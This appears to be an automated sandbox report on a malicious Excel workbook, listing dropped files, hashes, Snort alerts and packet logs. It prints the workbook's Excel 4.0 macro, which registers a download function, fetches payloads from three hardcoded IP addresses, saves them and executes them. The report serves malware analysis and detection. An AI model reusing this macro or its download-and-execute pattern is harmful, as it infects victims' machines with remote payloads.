                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N*.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!.*.. c....|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.||I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Jun 26 00:50:35 2021, atime=Sat Jun 26 00:50:35 2021, length=8192, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.635179118071064
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8HEFXUyNuElPCH2Axjd3YYLy+WrjAZ/2bDDLC5Lu4t2Y+xIBjKZm:8HEjw52AZiDq87aB6m
                                                                                                                                                  MD5:5A542CF153A4F208DD1A27786ADD2D0F
                                                                                                                                                  SHA1:9C808F3AC08BC4B8BA9903329B4F97FB54A59638
                                                                                                                                                  SHA-256:42610F84BABA355F57E5EF6137D9B0303771FC1DC972270C82D227A304C769ED
                                                                                                                                                  SHA-512:97ECA180D072663F19D2150D4832054ED36745BAF8383A4200EEE201069C14CD14187824096FA625F5E62DCE446AB3347973F0FE6691C022BA7A21F9AB8A8B62
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F........N....-.....-j.....-j... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RH.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..RH......S....................i.i.h.a.r.d.z.....~.1......RR...Desktop.h.......Ny..RR......Y..............>.....@...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-40776837-06252021.xlsm.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Sat Jun 26 00:50:35 2021, atime=Sat Jun 26 00:50:35 2021, length=153172, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2300
                                                                                                                                                  Entropy (8bit):4.690045153309288
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:8wEn967R3L9632B6pwEn967R3L9632B6:8NYs2KNYs2
                                                                                                                                                  MD5:F90C29B7CE79EAA5633E4CF70A8FF168
                                                                                                                                                  SHA1:FFB1525783BD74AB1AFE2306A5A25901913E28A0
                                                                                                                                                  SHA-256:C2C659D42294473A144149EFB2E3534AB2A54718EA9DA9DFA71D244366D31E72
                                                                                                                                                  SHA-512:982E66FD4415175CDDBC3D8CA03CDCD61C54B245D5074CE6F2FDD68DB50D377CFA31B0BAB28DAEB902E85FD93C6E4841490FE8631E1C3489AF5411DB348296BA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.... ...Z[..:...3..-j...N.-j..TV...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RH.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..RH......S....................i.i.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..RH......Y..............>.......U.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...RM. .PERMIS~1.XLS..t......>Qvx.RM.....h......................\B.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.......g...............-.......f...........>.S......C:\Users\user\Desktop\Permission-40776837-06252021.xlsm..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):154
                                                                                                                                                  Entropy (8bit):4.802998385735191
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:oyBVomxW+LxtTUSOX9rpStLxtTUSOX9rpSmxW+LxtTUSOX9rpSv:djHxOdpEFxOdpJxOdpc
                                                                                                                                                  MD5:2877FE79BD75DE1064CDA22221B5D82A
                                                                                                                                                  SHA1:4E36822B3AF2ED15AEE01E001AB418E44972992A
                                                                                                                                                  SHA-256:9E3FF45D5278D40B927316486E0662F038DF0B0DDA7CC45AB1D70D53687DC25A
                                                                                                                                                  SHA-512:26084486668D924BBD4961BC51B8C7DFC903700BC2F5FFF645514BD0A1834639A17D25065F8E78632B3B14CBE46729F7889A57467A3B4231EC7253E07C8F81E2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: Desktop.LNK=0..[misc]..Permission-40776837-06252021.xlsm.LNK=0..Permission-40776837-06252021.xlsm.LNK=0..[misc]..Permission-40776837-06252021.xlsm.LNK=0..
                                                                                                                                                  C:\Users\user\Desktop\A6810000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):153172
                                                                                                                                                  Entropy (8bit):7.664763799679478
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:XmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO7:24P4346PgZw9gQaA
                                                                                                                                                  MD5:5F54D35FF8B3B7C0279821C4357F5D13
                                                                                                                                                  SHA1:B7C82C233607FA59CE32139A1544BAC1521571A8
                                                                                                                                                  SHA-256:96BC46BC3F626227704066F04E772730D4F160FCAC102F0D3919241F10CC35DB
                                                                                                                                                  SHA-512:1FF50BFA57F1076E50A18AF23C78AEBCA029C0AE8EB4A548AB178074A732234AA25F9EECB6D12ED71F1FC61530B130C1E75D3B574C7507AC40B028E08A28695E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N*.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!.*.. c....|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.||I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                  MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                  SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                  SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                  SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.666398010242972
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                  • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                  File name:Permission-40776837-06252021.xlsm
                                                                                                                                                  File size:153750
                                                                                                                                                  MD5:2cd2fd004b5589a595239f202ac648ae
                                                                                                                                                  SHA1:ac02da8a953fd89f325c64bf5df93e415350ec12
                                                                                                                                                  SHA256:ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
                                                                                                                                                  SHA512:6cac4bb0573617012f4dbfe93fec4c18c824be4b452407a09af5b46d88326e24d828b5a4eea9b762c687a1fd6b98de8235ff9bad418313a00d9e6e36c38ffe8a
                                                                                                                                                  SSDEEP:3072:QmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOYJ:P4P4346PgZw9gQaVJ
                                                                                                                                                  File Content Preview:PK..........!.........o.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74ecd0e2f696908c

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Permission-40776837-06252021.xlsm"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                  ,=NOW()&H8,.dat,,,,,,,"=REGISTER(Sheet2!O12,Sheet2!O13,Sheet2!O14,Sheet2!O15,,1,9)","=""http://185.240.103.219/""","=Jerutyg(0,F13&G8,""..\Kro.fis"",0,0)","=""http://190.14.37.3/""","=Jerutyg(0,F14&G8,""..\Kro.fis1"",0,0)","=""http://185.183.99.120/""","=Jerutyg(0,F15&G8,""..\Kro.fis2"",0,0)",,,,,,,,,,,,,,,,,,,,=RUN(Sheet4!I9),
                                                                                                                                                  =EXEC(Sheet2!O22)"=EXEC(Sheet2!O22&""1"")""=EXEC(Sheet2!O22&""2"")"=HALT()

                                                                                                                                                  Network Behavior

                                                                                                                                                  Snort IDS Alerts

                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                  06/25/21-18:43:10.505432ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:13.515728ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:19.735650ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:32.155929ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:35.295940ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:41.478686ICMP399ICMP Destination Unreachable Host Unreachable186.148.101.114192.168.2.22
                                                                                                                                                  06/25/21-18:43:52.235681TCP1201ATTACK-RESPONSES 403 Forbidden8049169185.183.99.120192.168.2.22

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jun 25, 2021 18:50:35.329961061 CEST4971080192.168.2.3185.240.103.219
                                                                                                                                                  Jun 25, 2021 18:50:35.419142962 CEST8049710185.240.103.219192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:35.955828905 CEST4971080192.168.2.3185.240.103.219
                                                                                                                                                  Jun 25, 2021 18:50:36.044797897 CEST8049710185.240.103.219192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:36.729530096 CEST4971080192.168.2.3185.240.103.219
                                                                                                                                                  Jun 25, 2021 18:50:36.818770885 CEST8049710185.240.103.219192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:36.831753016 CEST4971380192.168.2.3190.14.37.3
                                                                                                                                                  Jun 25, 2021 18:50:39.839215994 CEST4971380192.168.2.3190.14.37.3
                                                                                                                                                  Jun 25, 2021 18:50:45.839742899 CEST4971380192.168.2.3190.14.37.3
                                                                                                                                                  Jun 25, 2021 18:50:57.903893948 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:50:57.971148014 CEST8049729185.183.99.120192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:57.971276999 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:50:57.973424911 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:50:58.038516045 CEST8049729185.183.99.120192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:58.294532061 CEST8049729185.183.99.120192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:58.294696093 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:52:03.298073053 CEST8049729185.183.99.120192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:52:03.298263073 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:52:22.020569086 CEST4972980192.168.2.3185.183.99.120
                                                                                                                                                  Jun 25, 2021 18:52:22.084696054 CEST8049729185.183.99.120192.168.2.3

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jun 25, 2021 18:50:19.810643911 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:19.879683971 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:20.256871939 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:20.313234091 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:20.750936031 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:20.810126066 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:22.241734982 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:22.294462919 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:23.674243927 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:23.732770920 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:24.743762970 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:24.800446987 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:28.828699112 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:28.883744955 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:31.043193102 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:31.089494944 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:32.037458897 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:32.147217989 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:32.582799911 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:32.657250881 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:33.619904041 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:33.692002058 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:34.666982889 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:34.726264000 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:35.354074955 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:35.411569118 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:36.259536982 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:36.316579103 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:36.667165995 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:36.727368116 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:37.393304110 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:37.448817015 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:38.257772923 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:38.303987980 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:39.123522997 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:39.174053907 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:39.911742926 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:39.958201885 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:40.795144081 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:40.846277952 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:41.082525969 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:41.150320053 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:43.069267035 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:43.126393080 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:44.159279108 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:44.217035055 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:44.955938101 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:45.008265018 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:45.894210100 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:45.942765951 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:46.643114090 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:46.693327904 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:53.070477962 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:53.134277105 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:50:58.203706026 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:50:58.269130945 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:09.994662046 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:10.066056967 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:13.379555941 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:13.550486088 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:14.448649883 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:14.507313013 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:16.205517054 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:16.265022993 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:16.273585081 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:16.419866085 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:16.862550974 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:16.918747902 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:17.853729963 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:17.917100906 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:18.765666008 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:18.826708078 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:19.273528099 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:19.335311890 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:20.186266899 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:20.243901014 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:21.175168037 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:21.233876944 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:21.705694914 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:21.764916897 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:28.676196098 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:28.733829975 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:31.207365990 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:31.272627115 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:51:39.135790110 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:51:39.194905996 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:52:03.888739109 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:52:03.958210945 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                  Jun 25, 2021 18:52:05.454044104 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                  Jun 25, 2021 18:52:05.531568050 CEST53594208.8.8.8192.168.2.3

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 185.183.99.120

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.349729185.183.99.12080C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jun 25, 2021 18:50:57.973424911 CEST1450OUTGET /44372.78513125.dat HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 185.183.99.120
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jun 25, 2021 18:50:58.294532061 CEST1452INHTTP/1.1 403 Forbidden
                                                                                                                                                  Server: nginx
                                                                                                                                                  Date: Fri, 25 Jun 2021 16:51:13 GMT
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Content-Length: 548
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                  Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  CPU Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Memory Usage

                                                                                                                                                  Click to jump to process

                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:18:50:30
                                                                                                                                                  Start date:25/06/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
